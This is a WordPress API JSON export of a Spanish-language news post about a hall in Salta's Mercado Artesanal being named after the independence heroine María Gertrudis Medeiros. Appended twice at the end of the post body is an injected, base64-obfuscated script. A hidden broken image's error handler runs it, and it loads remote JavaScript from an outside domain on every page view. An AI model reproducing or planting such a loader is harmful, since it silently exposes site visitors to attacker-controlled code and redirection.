{"id":2334,"date":"2023-03-10T13:23:51","date_gmt":"2023-03-10T16:23:51","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2334"},"modified":"2025-08-14T00:21:30","modified_gmt":"2025-08-14T03:21:30","slug":"se-nombro-maria-gertrudis-medeiros-al-salon-de-usos-multiples-del-mercado-artesanal-de-salta","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2334","title":{"rendered":"<a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/se-nombro-maria-gertrudis-medeiros-al-salon-de-usos-multiples-del-mercado-artesanal-de-salta-88393\">Se nombr\u00f3 Mar\u00eda Gertrudis Medeiros al sal\u00f3n de usos m\u00faltiples del Mercado Artesanal de Salta<\/a>"},"content":{"rendered":"\n<h4 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#4e0b1b\"><em>En el marco del Mes de la Mujer, autoridades provinciales y municipales de Campo Santo participaron de los actos protocolares que rindieron homenaje a la hero\u00edna salte\u00f1a.<\/em><\/h4>\n\n\n\n<p>El sal\u00f3n de usos m\u00faltiples de la antigua casona desde hoy llevar\u00e1 el nombre de Mar\u00eda Gertrudis Medeiros, solar que fue testigo de su valent\u00eda y entrega por la Patria en el siglo XVIII.<\/p>\n\n\n\n<p>La directora del Mercado Artesanal de Salta,<strong>\u00a0Yanina Lenti<\/strong>, destac\u00f3: \u201cA partir del a\u00f1o 2021 en la gesti\u00f3n del gobernador Gustavo Sa\u00e9nz y desde su reapertura contamos con este sal\u00f3n de usos m\u00faltiples y que hoy nos llena de orgullo poder nombrarlo como Mar\u00eda Gertrudis Medeiros, un ejemplo de lucha, valores y amor a la Patria\u201d.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft size-large is-resized\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/6104-se-nombro-maria-gertrudis-medeiros-al-salon-de-usos-multiples-del-mercado-artesanal-de-salta.jpg\" alt=\"\" width=\"267\" height=\"178\"\/><\/figure><\/div>\n\n\n<p>\u201cEs importante saber sobre nuestra historia, nuestras mujeres, el trabajo fundamental que hicieron por la Patria y que es responsabilidad nuestra reivindicarlas, coloc\u00e1ndolas en el lugar que siempre merecieron\u201d, finaliz\u00f3 Lenti.<\/p>\n\n\n\n<p>Por su parte, la intendenta de Campo Santo,\u00a0<strong>Josefina Pastrana<\/strong>, hizo entrega de una placa de reconocimiento a la hero\u00edna de la Patria, quien luch\u00f3 a la par de Manuel Belgrano y Mart\u00edn Miguel de G\u00fcemes por la Independencia y se\u00f1al\u00f3: \u201cNosotros venimos realizando un trabajo arduo durante mucho tiempo con presentaciones en el Senado de la Naci\u00f3n con esta hero\u00edna tan importante para el pueblo de Campo Santo\u201d.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-large is-resized\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/6105-se-nombro-maria-gertrudis-medeiros-al-salon-de-usos-multiples-del-mercado-artesanal-de-salta.jpg\" alt=\"\" width=\"255\" height=\"170\"\/><\/figure><\/div>\n\n\n<p>Asimismo, la autora del Proyecto de Ley que declara hero\u00edna nacional a Mar\u00eda Gertrudis Medeiros, la diputada nacional,&nbsp;<strong>Virginia Cornejo<\/strong>&nbsp;manifest\u00f3: \u201cQue sea un s\u00edmbolo de los valores que nunca debemos perder, esos valores que tuvieron quienes lucharon por la Independencia de nuestra Patria y nos dejaron sin duda un camino a seguir y que lo debemos conservar e imitar siempre\u201d.<\/p>\n\n\n\n<p>El secretario de Cultura de la Provincia,\u00a0<strong>Diego Ashur<\/strong>\u00a0se refiri\u00f3 al trabajo que viene realizando el Gobierno Provincial a trav\u00e9s de todas sus \u00e1reas para acompa\u00f1ar y visibilizar la lucha de las mujeres y destac\u00f3 la creaci\u00f3n de la Secretar\u00eda de las Mujeres, G\u00e9neros y Diversidad, como una pol\u00edtica de estado en materia de g\u00e9nero, igualdad, diversidad y prevenci\u00f3n de las violencias.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft size-large is-resized\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/6106-se-nombro-maria-gertrudis-medeiros-al-salon-de-usos-multiples-del-mercado-artesanal-de-salta-20230310122908.jpg\" alt=\"\" width=\"267\" height=\"178\"\/><\/figure><\/div>\n\n\n<p>Seguidamente, el historiador y director de Cultura de Campo Santo,&nbsp;<strong>Eduardo Medina<\/strong>&nbsp;se refiri\u00f3 a su lucha, sacrificio y esfuerzo de la hero\u00edna brindando una Semblanza a Gertrudis.<\/p>\n\n\n\n<p>El poeta, artista y compositor, Jos\u00e9 Cantero Verni junto a Sergio Paredes y Miguel Maman\u00ed homenajearon con una cantata a Mar\u00eda Gertrudis Medeiros y para culminar se comparti\u00f3 un vino de honor con los presentes gentileza de la Cooperativa de Productores Vitivin\u00edcolas Cafayate Bodega Trassoles, sal\u00f3n de venta y exposici\u00f3n n\u00famero 18 del Mercado Artesanal.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/6107-se-nombro-maria-gertrudis-medeiros-al-salon-de-usos-multiples-del-mercado-artesanal-de-salta.jpg\" alt=\"\" width=\"240\" height=\"159\"\/><\/figure><\/div>\n\n\n<p>El descubrimiento de la placa estuvo a cargo de la directora del Mercado Artesanal, Yanina Lenti; la intendenta de Campo Santo, Josefina Pastrana; la diputada Nacional, Virginia Cornejo y la descendiente de la hero\u00edna, Francisca Fern\u00e1ndez Cornejo.<\/p>\n\n\n\n<p>Acompa\u00f1aron en el acto, la Subcomisi\u00f3n de Damas de la Agrupaci\u00f3n Tradicionalista de Salta Gauchos de G\u00fcemes y representantes del Fort\u00edn Los Yacones, La Caldera. \u00a0<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"Se nombr\u00f3 Mar\u00eda Gertrudis Medeiros al sal\u00f3n de usos m\u00faltiples del Mercado Artesanal de Salta\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/Um4JkQedcnA?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/se-nombro-maria-gertrudis-medeiros-al-salon-de-usos-multiples-del-mercado-artesanal-de-salta-88393\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En el marco del Mes de la Mujer, autoridades provinciales y municipales de Campo Santo participaron de los actos protocolares que rindieron homenaje a la hero\u00edna salte\u00f1a. El sal\u00f3n de usos m\u00faltiples de la antigua casona desde hoy llevar\u00e1 el nombre de Mar\u00eda Gertrudis Medeiros, solar que fue testigo de su valent\u00eda y entrega por [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2335,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-2334","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2334"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2334"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2334\/revisions"}],"predecessor-version":[{"id":7150,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2334\/revisions\/7150"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2335"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2334"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2334"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2334"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}